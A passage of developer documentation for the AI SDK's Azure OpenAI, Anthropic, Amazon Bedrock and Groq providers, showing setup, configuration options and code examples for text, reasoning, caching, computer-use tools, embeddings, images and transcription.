  model: azure('your-deployment-name'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

OpenAI language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

Provider Options

When using OpenAI language models on Azure, you can configure provider-specific options using providerOptions.openai. More information on available configuration options are on the OpenAI provider page.

const messages = [
  {
    role: 'user',
    content: [
      {
        type: 'text',
        text: 'What is the capital of the moon?',
      },
      {
        type: 'image',
        image: 'https://example.com/image.png',
        providerOptions: {
          openai: { imageDetail: 'low' },
        },
      },
    ],
  },
];

const { text } = await generateText({
  model: azure('your-deployment-name'),
  providerOptions: {
    openai: {
      reasoningEffort: 'low',
    },
  },
});

Chat Models

Azure OpenAI chat models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = azure('your-deployment-name', {
  logitBias: {
    // optional likelihood for specific tokens
    '50256': -100,
  },
  user: 'test-user', // optional unique user identifier
});

The following optional settings are available for OpenAI chat models:

logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Default to true.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Responses Models

You can use the Azure OpenAI responses API with the azure.responses(deploymentName) factory method.

const model = azure.responses('your-deployment-name');

Further configuration can be done using OpenAI provider options. You can validate the provider options using the OpenAIResponsesProviderOptions type.

import { azure, OpenAIResponsesProviderOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';

const result = await generateText({
  model: azure.responses('your-deployment-name'),
  providerOptions: {
    openai: {
      parallelToolCalls: false,
      store: false,
      user: 'user_123',
      // ...
    } satisfies OpenAIResponsesProviderOptions,
  },
  // ...
});

The following provider options are available:

parallelToolCalls boolean Whether to use parallel tool calls. Defaults to true.
store boolean Whether to store the generation. Defaults to true.
metadata Record<string, string> Additional metadata to store with the generation.
previousResponseId string The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
instructions string Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
user string A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
reasoningEffort 'low' | 'medium' | 'high' Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
strictSchemas boolean Whether to use strict JSON schemas in tools and when generating JSON outputs. Defaults to true.

The Azure OpenAI responses provider also returns provider-specific metadata:

const { providerMetadata } = await generateText({
  model: azure.responses('your-deployment-name'),
});

const openaiMetadata = providerMetadata?.openai;

The following OpenAI-specific metadata is returned:

responseId string The ID of the response. Can be used to continue a conversation.
cachedPromptTokens number The number of prompt tokens that were a cache hit.
reasoningTokens number The number of reasoning tokens that the model generated.

PDF support

The Azure OpenAI Responses API supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: azure.responses('your-deployment-name'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mimeType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

Completion Models

You can create models that call the completions API using the .completion() factory method. The first argument is the model id. Currently only gpt-35-turbo-instruct is supported.

const model = azure.completion('your-gpt-35-turbo-instruct-deployment');

OpenAI completion models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = azure.completion('your-gpt-35-turbo-instruct-deployment', {
  echo: true, // optional, echo the prompt in addition to the completion
  logitBias: {
    // optional likelihood for specific tokens
    '50256': -100,
  },
  suffix: 'some text', // optional suffix that comes after a completion of inserted text
  user: 'test-user', // optional unique user identifier
});

The following optional settings are available for Azure OpenAI completion models:

echo: boolean

Echo back the prompt in addition to the completion.
logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
suffix string

The suffix that comes after a completion of inserted text.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Embedding Models

You can create models that call the Azure OpenAI embeddings API using the .embedding() factory method.

const model = azure.embedding('your-embedding-deployment');

Azure OpenAI embedding models support several additional settings. You can pass them as an options argument:

const model = azure.embedding('your-embedding-deployment', {
  dimensions: 512 // optional, number of dimensions for the embedding
  user: 'test-user' // optional unique user identifier
})

The following optional settings are available for Azure OpenAI embedding models:

dimensions: number

The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Image Models

You can create models that call the Azure OpenAI image generation API (DALL-E) using the .imageModel() factory method. The first argument is your deployment name for the DALL-E model.

const model = azure.imageModel('your-dalle-deployment-name');

Azure OpenAI image models support several additional settings. You can pass them as an options argument:

const model = azure.imageModel('your-dalle-deployment-name', {
  user: 'test-user', // optional unique user identifier
  responseFormat: 'url', // 'url' or 'b64_json', defaults to 'url'
});

Example

You can use Azure OpenAI image models to generate images with the generateImage function:

import { azure } from '@ai-sdk/azure';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: azure.imageModel('your-dalle-deployment-name'),
  prompt: 'A photorealistic image of a cat astronaut floating in space',
  size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
});

// image contains the URL or base64 data of the generated image
console.log(image);

Model Capabilities

Azure OpenAI supports DALL-E 2 and DALL-E 3 models through deployments. The capabilities depend on which model version your deployment is using:

Model Version	Sizes
DALL-E 3	1024x1024, 1792x1024, 1024x1792
DALL-E 2	256x256, 512x512, 1024x1024

Transcription Models

You can create models that call the Azure OpenAI transcription API using the .transcription() factory method.

The first argument is the model id e.g. whisper-1.

const model = azure.transcription('whisper-1');

import { experimental_transcribe as transcribe } from 'ai';
import { azure } from '@ai-sdk/azure';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: azure.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  providerOptions: { azure: { language: 'en' } },
});

The following provider options are available:

timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
include string[] Additional information to include in the transcription response.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper-1`
`gpt-4o-mini-transcribe`
`gpt-4o-transcribe`

title: Anthropic description: Learn how to use the Anthropic provider for the AI SDK.

Anthropic Provider

The Anthropic provider contains language model support for the Anthropic Messages API.

Setup

The Anthropic provider is available in the @ai-sdk/anthropic module. You can install it with

Provider Instance

You can import the default provider instance anthropic from @ai-sdk/anthropic:

import { anthropic } from '@ai-sdk/anthropic';

If you need a customized setup, you can import createAnthropic from @ai-sdk/anthropic and create a provider instance with your settings:

import { createAnthropic } from '@ai-sdk/anthropic';

const anthropic = createAnthropic({
  // custom settings
});

You can use the following optional settings to customize the Anthropic provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.anthropic.com/v1.
apiKey string

API key that is being sent using the x-api-key header. It defaults to the ANTHROPIC_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Anthropic Messages API using the provider instance. The first argument is the model id, e.g. claude-3-haiku-20240307. Some models have multi-modal capabilities.

const model = anthropic('claude-3-haiku-20240307');

You can use Anthropic language models to generate text with the generateText function:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-3-haiku-20240307'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Anthropic language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

The following optional settings are available for Anthropic models:

sendReasoning boolean

Optional. Include reasoning content in requests sent to the model. Defaults to true.

If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.

Reasoning

Anthropic has reasoning support for claude-4-opus-20250514, claude-4-sonnet-20250514, and claude-3-7-sonnet-20250219 models.

You can enable it using the thinking provider option and specifying a thinking budget in tokens.

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoning, reasoningDetails } = await generateText({
  model: anthropic('claude-4-opus-20250514'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    } satisfies AnthropicProviderOptions,
  },
});

console.log(reasoning); // reasoning text
console.log(reasoningDetails); // reasoning details including redacted reasoning
console.log(text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Cache Control

In the messages and message parts, you can use the providerOptions property to set cache control breakpoints. You need to set the anthropic property in the providerOptions object to { cacheControl: { type: 'ephemeral' } } to set a cache control breakpoint.

The cache creation input tokens are then returned in the providerMetadata object for generateText and generateObject, again under the anthropic property. When you use streamText or streamObject, the response contains a promise that resolves to the metadata. Alternatively you can receive it in the onFinish callback.

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const errorMessage = '... long error message ...';

const result = await generateText({
  model: anthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'You are a JavaScript expert.' },
        {
          type: 'text',
          text: `Error message: ${errorMessage}`,
          providerOptions: {
            anthropic: { cacheControl: { type: 'ephemeral' } },
          },
        },
        { type: 'text', text: 'Explain the error message.' },
      ],
    },
  ],
});

console.log(result.text);
console.log(result.providerMetadata?.anthropic);
// e.g. { cacheCreationInputTokens: 2118, cacheReadInputTokens: 0 }

You can also use cache control on system messages by providing multiple system messages at the head of your messages array:

const result = await generateText({
  model: anthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'system',
      content: 'Cached system message part',
      providerOptions: {
        anthropic: { cacheControl: { type: 'ephemeral' } },
      },
    },
    {
      role: 'system',
      content: 'Uncached system message part',
    },
    {
      role: 'user',
      content: 'User prompt',
    },
  ],
});

The minimum cacheable prompt length is:

1024 tokens for Claude 3.7 Sonnet, Claude 3.5 Sonnet and Claude 3 Opus
2048 tokens for Claude 3.5 Haiku and Claude 3 Haiku

Shorter prompts cannot be cached, even if marked with cacheControl. Any requests to cache fewer than this number of tokens will be processed without caching.

For more on prompt caching with Anthropic, see Anthropic's Cache Control documentation.

Computer Use

Anthropic provides three built-in tools that can be used to interact with external systems:

Bash Tool: Allows running bash commands.
Text Editor Tool: Provides functionality for viewing and editing text files.
Computer Tool: Enables control of keyboard and mouse actions on a computer.

They are available via the tools property of the provider instance.

Bash Tool

The Bash Tool allows running bash commands. Here's how to create and use it:

const bashTool = anthropic.tools.bash_20241022({
  execute: async ({ command, restart }) => {
    // Implement your bash command execution logic here
    // Return the result of the command execution
  },
});

Parameters:

command (string): The bash command to run. Required unless the tool is being restarted.
restart (boolean, optional): Specifying true will restart this tool.

Text Editor Tool

The Text Editor Tool provides functionality for viewing and editing text files:

const textEditorTool = anthropic.tools.textEditor_20241022({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    old_str,
    view_range,
  }) => {
    // Implement your text editing logic here
    // Return the result of the text editing operation
  },
});

Parameters:

command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run.
path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
file_text (string, optional): Required for create command, with the content of the file to be created.
insert_line (number, optional): Required for insert command. The line number after which to insert the new string.
new_str (string, optional): New string for str_replace or insert commands.
old_str (string, optional): Required for str_replace command, containing the string to replace.
view_range (number[], optional): Optional for view command to specify line range to show.

When using the Text Editor Tool, make sure to name the key in the tools object str_replace_editor.

const response = await generateText({
  model: anthropic('claude-3-5-sonnet-20241022'),
  prompt:
    "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
  tools: {
    str_replace_editor: textEditorTool,
  },
});

Computer Tool

The Computer Tool enables control of keyboard and mouse actions on a computer:

const computerTool = anthropic.tools.computer_20241022({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  displayNumber: 0, // Optional, for X11 environments

  execute: async ({ action, coordinate, text }) => {
    // Implement your computer control logic here
    // Return the result of the action

    // Example code:
    switch (action) {
      case 'screenshot': {
        // multipart result:
        return {
          type: 'image',
          data: fs
            .readFileSync('./data/screenshot-editor.png')
            .toString('base64'),
        };
      }
      default: {
        console.log('Action:', action);
        console.log('Coordinate:', coordinate);
        console.log('Text:', text);
        return `executed ${action}`;
      }
    }
  },

  // map to tool result content for LLM consumption:
  experimental_toToolResultContent(result) {
    return typeof result === 'string'
      ? [{ type: 'text', text: result }]
      : [{ type: 'image', data: result.data, mimeType: 'image/png' }];
  },
});

Parameters:

action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
text (string, optional): Required for type and key actions.

These tools can be used in conjunction with the sonnet-3-5-sonnet-20240620 model to enable more complex interactions and tasks.

PDF support

Anthropic Sonnet claude-3-5-sonnet-20241022 supports reading PDF files. You can pass PDF files as part of the message content using the file type:

Option 1: URL-based PDF document

const result = await generateText({
  model: anthropic('claude-3-5-sonnet-20241022'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: new URL(
            'https://github.com/vercel/ai/blob/main/examples/ai-core/data/ai.pdf?raw=true',
          ),
          mimeType: 'application/pdf',
        },
      ],
    },
  ],
});

Option 2: Base64-encoded PDF document

const result = await generateText({
  model: anthropic('claude-3-5-sonnet-20241022'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mimeType: 'application/pdf',
        },
      ],
    },
  ],
});

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Computer Use
`claude-4-opus-20250514`
`claude-4-sonnet-20250514`
`claude-3-7-sonnet-20250219`
`claude-3-5-sonnet-20241022`
`claude-3-5-sonnet-20240620`
`claude-3-5-haiku-20241022`
`claude-3-opus-20240229`
`claude-3-sonnet-20240229`
`claude-3-haiku-20240307`

title: Amazon Bedrock description: Learn how to use the Amazon Bedrock provider.

Amazon Bedrock Provider

The Amazon Bedrock provider for the AI SDK contains language model support for the Amazon Bedrock APIs.

Setup

The Bedrock provider is available in the @ai-sdk/amazon-bedrock module. You can install it with

Prerequisites

Access to Amazon Bedrock foundation models isn't granted by default. In order to gain access to a foundation model, an IAM user with sufficient permissions needs to request access to it through the console. Once access is provided to a model, it is available for all users in the account.

See the Model Access Docs for more information.

Authentication

Using IAM Access Key and Secret Key

Step 1: Creating AWS Access Key and Secret Key

To get started, you'll need to create an AWS access key and secret key. Here's how:

Login to AWS Management Console

Go to the AWS Management Console and log in with your AWS account credentials.

Create an IAM User

Navigate to the IAM dashboard and click on "Users" in the left-hand navigation menu.
Click on "Create user" and fill in the required details to create a new IAM user.
Make sure to select "Programmatic access" as the access type.
The user account needs the AmazonBedrockFullAccess policy attached to it.

Create Access Key

Click on the "Security credentials" tab and then click on "Create access key".
Click "Create access key" to generate a new access key pair.
Download the .csv file containing the access key ID and secret access key.

Step 2: Configuring the Access Key and Secret Key

Within your project add a .env file if you don't already have one. This file will be used to set the access key and secret key as environment variables. Add the following lines to the .env file:

AWS_ACCESS_KEY_ID=YOUR_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY=YOUR_SECRET_ACCESS_KEY
AWS_REGION=YOUR_REGION

Remember to replace YOUR_ACCESS_KEY_ID, YOUR_SECRET_ACCESS_KEY, and YOUR_REGION with the actual values from your AWS account.

Using AWS SDK Credentials Chain (instance profiles, instance roles, ECS roles, EKS Service Accounts, etc.)

When using AWS SDK, the SDK will automatically use the credentials chain to determine the credentials to use. This includes instance profiles, instance roles, ECS roles, EKS Service Accounts, etc. A similar behavior is possible using the AI SDK by not specifying the accessKeyId and secretAccessKey, sessionToken properties in the provider settings and instead passing a credentialProvider property.

Usage:

@aws-sdk/credential-providers package provides a set of credential providers that can be used to create a credential provider chain.

import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
import { fromNodeProviderChain } from '@aws-sdk/credential-providers';

const bedrock = createAmazonBedrock({
  region: 'us-east-1',
  credentialProvider: fromNodeProviderChain(),
});

Provider Instance

You can import the default provider instance bedrock from @ai-sdk/amazon-bedrock:

import { bedrock } from '@ai-sdk/amazon-bedrock';

If you need a customized setup, you can import createAmazonBedrock from @ai-sdk/amazon-bedrock and create a provider instance with your settings:

import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';

const bedrock = createAmazonBedrock({
  region: 'us-east-1',
  accessKeyId: 'xxxxxxxxx',
  secretAccessKey: 'xxxxxxxxx',
  sessionToken: 'xxxxxxxxx',
});

You can use the following optional settings to customize the Amazon Bedrock provider instance:

region string

The AWS region that you want to use for the API calls. It uses the AWS_REGION environment variable by default.
accessKeyId string

The AWS access key ID that you want to use for the API calls. It uses the AWS_ACCESS_KEY_ID environment variable by default.
secretAccessKey string

The AWS secret access key that you want to use for the API calls. It uses the AWS_SECRET_ACCESS_KEY environment variable by default.
sessionToken string

Optional. The AWS session token that you want to use for the API calls. It uses the AWS_SESSION_TOKEN environment variable by default.
credentialProvider () => Promise<{ accessKeyId: string; secretAccessKey: string; sessionToken?: string; }>

Optional. The AWS credential provider chain that you want to use for the API calls. It uses the specified credentials by default.

Language Models

You can create models that call the Bedrock API using the provider instance. The first argument is the model id, e.g. meta.llama3-70b-instruct-v1:0.

const model = bedrock('meta.llama3-70b-instruct-v1:0');

Amazon Bedrock models also support some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = bedrock('anthropic.claude-3-sonnet-20240229-v1:0', {
  additionalModelRequestFields: { top_k: 350 },
});

Documentation for additional settings based on the selected model can be found within the Amazon Bedrock Inference Parameter Documentation.

You can use Amazon Bedrock language models to generate text with the generateText function:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { text } = await generateText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Amazon Bedrock language models can also be used in the streamText function (see AI SDK Core).

File Inputs

The Amazon Bedrock provider supports file inputs, e.g. PDF files.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrock('anthropic.claude-3-haiku-20240307-v1:0'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe the pdf in detail.' },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mimeType: 'application/pdf',
        },
      ],
    },
  ],
});

Guardrails

You can use the bedrock provider options to utilize Amazon Bedrock Guardrails:

const result = await generateText({
  bedrock('anthropic.claude-3-sonnet-20240229-v1:0'),
  providerOptions: {
    bedrock: {
      guardrailConfig: {
        guardrailIdentifier: '1abcd2ef34gh',
        guardrailVersion: '1',
        trace: 'enabled' as const,
        streamProcessingMode: 'async',
      },
    },
  },
});

Tracing information will be returned in the provider metadata if you have tracing enabled.

if (result.providerMetadata?.bedrock.trace) {
  // ...
}

See the Amazon Bedrock Guardrails documentation for more information.

Cache Points

In messages, you can use the providerOptions property to set cache points. Set the bedrock property in the providerOptions object to { cachePoint: { type: 'default' } } to create a cache point.

Cache usage information is returned in the providerMetadata object`. See examples below.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const cyberpunkAnalysis =
  '... literary analysis of cyberpunk themes and concepts ...';

const result = await generateText({
  model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
  messages: [
    {
      role: 'system',
      content: `You are an expert on William Gibson's cyberpunk literature and themes. You have access to the following academic analysis: ${cyberpunkAnalysis}`,
      providerOptions: {
        bedrock: { cachePoint: { type: 'default' } },
      },
    },
    {
      role: 'user',
      content:
        'What are the key cyberpunk themes that Gibson explores in Neuromancer?',
    },
  ],
});

console.log(result.text);
console.log(result.providerMetadata?.bedrock?.usage);
// Shows cache read/write token usage, e.g.:
// {
//   cacheReadInputTokens: 1337,
//   cacheWriteInputTokens: 42,
// }

Cache points also work with streaming responses:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';

const cyberpunkAnalysis =
  '... literary analysis of cyberpunk themes and concepts ...';

const result = streamText({
  model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
  messages: [
    {
      role: 'assistant',
      content: [
        { type: 'text', text: 'You are an expert on cyberpunk literature.' },
        { type: 'text', text: `Academic analysis: ${cyberpunkAnalysis}` },
      ],
      providerOptions: { bedrock: { cachePoint: { type: 'default' } } },
    },
    {
      role: 'user',
      content:
        'How does Gibson explore the relationship between humanity and technology?',
    },
  ],
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

console.log(
  'Cache token usage:',
  (await result.providerMetadata)?.bedrock?.usage,
);
// Shows cache read/write token usage, e.g.:
// {
//   cacheReadInputTokens: 1337,
//   cacheWriteInputTokens: 42,
// }

Reasoning

Amazon Bedrock has reasoning support for the claude-3-7-sonnet-20250219 model.

You can enable it using the reasoningConfig provider option and specifying a thinking budget in tokens (minimum: 1024, maximum: 64000).

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { text, reasoning, reasoningDetails } = await generateText({
  model: bedrock('us.anthropic.claude-3-7-sonnet-20250219-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    bedrock: {
      reasoningConfig: { type: 'enabled', budgetTokens: 1024 },
    },
  },
});

console.log(reasoning); // reasoning text
console.log(reasoningDetails); // reasoning details including redacted reasoning
console.log(text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`amazon.titan-tg1-large`
`amazon.titan-text-express-v1`
`amazon.nova-micro-v1:0`
`amazon.nova-lite-v1:0`
`amazon.nova-pro-v1:0`
`anthropic.claude-4-sonnet-20250514-v1:0`
`anthropic.claude-4-opus-20250514-v1:0`
`anthropic.claude-3-7-sonnet-20250219-v1:0`
`anthropic.claude-3-5-sonnet-20241022-v2:0`
`anthropic.claude-3-5-sonnet-20240620-v1:0`
`anthropic.claude-3-5-haiku-20241022-v1:0`
`anthropic.claude-3-opus-20240229-v1:0`
`anthropic.claude-3-sonnet-20240229-v1:0`
`anthropic.claude-3-haiku-20240307-v1:0`
`anthropic.claude-v2:1`
`cohere.command-r-v1:0`
`cohere.command-r-plus-v1:0`
`deepseek.r1-v1:0`
`meta.llama2-13b-chat-v1`
`meta.llama2-70b-chat-v1`
`meta.llama3-8b-instruct-v1:0`
`meta.llama3-70b-instruct-v1:0`
`meta.llama3-1-8b-instruct-v1:0`
`meta.llama3-1-70b-instruct-v1:0`
`meta.llama3-1-405b-instruct-v1:0`
`meta.llama3-2-1b-instruct-v1:0`
`meta.llama3-2-3b-instruct-v1:0`
`meta.llama3-2-11b-instruct-v1:0`
`meta.llama3-2-90b-instruct-v1:0`
`mistral.mistral-7b-instruct-v0:2`
`mistral.mixtral-8x7b-instruct-v0:1`
`mistral.mistral-large-2402-v1:0`
`mistral.mistral-small-2402-v1:0`

Embedding Models

You can create models that call the Bedrock API Bedrock API using the .embedding() factory method.

const model = bedrock.embedding('amazon.titan-embed-text-v1');

Bedrock Titan embedding model amazon.titan-embed-text-v2:0 supports several additional settings. You can pass them as an options argument:

const model = bedrock.embedding('amazon.titan-embed-text-v2:0', {
  dimensions: 512 // optional, number of dimensions for the embedding
  normalize: true // optional  normalize the output embeddings
})

The following optional settings are available for Bedrock Titan embedding models:

dimensions: number

The number of dimensions the output embeddings should have. The following values are accepted: 1024 (default), 512, 256.
normalize boolean

Flag indicating whether or not to normalize the output embeddings. Defaults to true.

Model Capabilities

Model	Default Dimensions	Custom Dimensions
`amazon.titan-embed-text-v1`	1536
`amazon.titan-embed-text-v2:0`	1024

Image Models

You can create models that call the Bedrock API Bedrock API using the .image() factory method.

For more on the Amazon Nova Canvas image model, see the Nova Canvas Overview.

const model = bedrock.image('amazon.nova-canvas-v1:0');

You can then generate images with the experimental_generateImage function:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: bedrock.imageModel('amazon.nova-canvas-v1:0'),
  prompt: 'A beautiful sunset over a calm ocean',
  size: '512x512',
  seed: 42,
});

You can also pass the providerOptions object to the generateImage function to customize the generation behavior:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: bedrock.imageModel('amazon.nova-canvas-v1:0'),
  prompt: 'A beautiful sunset over a calm ocean',
  size: '512x512',
  seed: 42,
  providerOptions: { bedrock: { quality: 'premium' } },
});

Documentation for additional settings can be found within the Amazon Bedrock User Guide for Amazon Nova Documentation.

Image Model Settings

When creating an image model, you can customize the generation behavior with optional settings:

const model = bedrock.imageModel('amazon.nova-canvas-v1:0', {
  maxImagesPerCall: 1, // Maximum number of images to generate per API call
});

maxImagesPerCall number

Override the maximum number of images generated per API call. Default can vary by model, with 5 as a common default.

Model Capabilities

The Amazon Nova Canvas model supports custom sizes with constraints as follows:

Each side must be between 320-4096 pixels, inclusive.
Each side must be evenly divisible by 16.
The aspect ratio must be between 1:4 and 4:1. That is, one side can't be more than 4 times longer than the other side.
The total pixel count must be less than 4,194,304.

For more, see Image generation access and usage.

Model	Sizes
`amazon.nova-canvas-v1:0`	Custom sizes: 320-4096px per side (must be divisible by 16), aspect ratio 1:4 to 4:1, max 4.2M pixels

Response Headers

The Amazon Bedrock provider will return the response headers associated with network requests made of the Bedrock servers.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { text } = await generateText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

console.log(result.response.headers);

Below is sample output where you can see the x-amzn-requestid header. This can be useful for correlating Bedrock API calls with requests made by the AI SDK:

{
  connection: 'keep-alive',
  'content-length': '2399',
  'content-type': 'application/json',
  date: 'Fri, 07 Feb 2025 04:28:30 GMT',
  'x-amzn-requestid': 'c9f3ace4-dd5d-49e5-9807-39aedfa47c8e'
}

This information is also available with streamText:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';

const result = streamText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}
console.log('Response headers:', (await result.response).headers);

With sample output as:

{
  connection: 'keep-alive',
  'content-type': 'application/vnd.amazon.eventstream',
  date: 'Fri, 07 Feb 2025 04:33:37 GMT',
  'transfer-encoding': 'chunked',
  'x-amzn-requestid': 'a976e3fc-0e45-4241-9954-b9bdd80ab407'
}

Migrating to `@ai-sdk/amazon-bedrock` 2.x

The Amazon Bedrock provider was rewritten in version 2.x to remove the dependency on the @aws-sdk/client-bedrock-runtime package.

The bedrockOptions provider setting previously available has been removed. If you were using the bedrockOptions object, you should now use the region, accessKeyId, secretAccessKey, and sessionToken settings directly instead.

Note that you may need to set all of these explicitly, e.g. even if you're not using sessionToken, set it to undefined. If you're running in a serverless environment, there may be default environment variables set by your containing environment that the Amazon Bedrock provider will then pick up and could conflict with the ones you're intending to use.

title: Groq description: Learn how to use Groq.

Groq Provider

The Groq provider contains language model support for the Groq API.

Setup

The Groq provider is available via the @ai-sdk/groq module. You can install it with

Provider Instance

You can import the default provider instance groq from @ai-sdk/groq:

import { groq } from '@ai-sdk/groq';

If you need a customized setup, you can import createGroq from @ai-sdk/groq and create a provider instance with your settings:

import { createGroq } from '@ai-sdk/groq';

const groq = createGroq({
  // custom settings
});

You can use the following optional settings to customize the Groq provider instance:

baseURL string

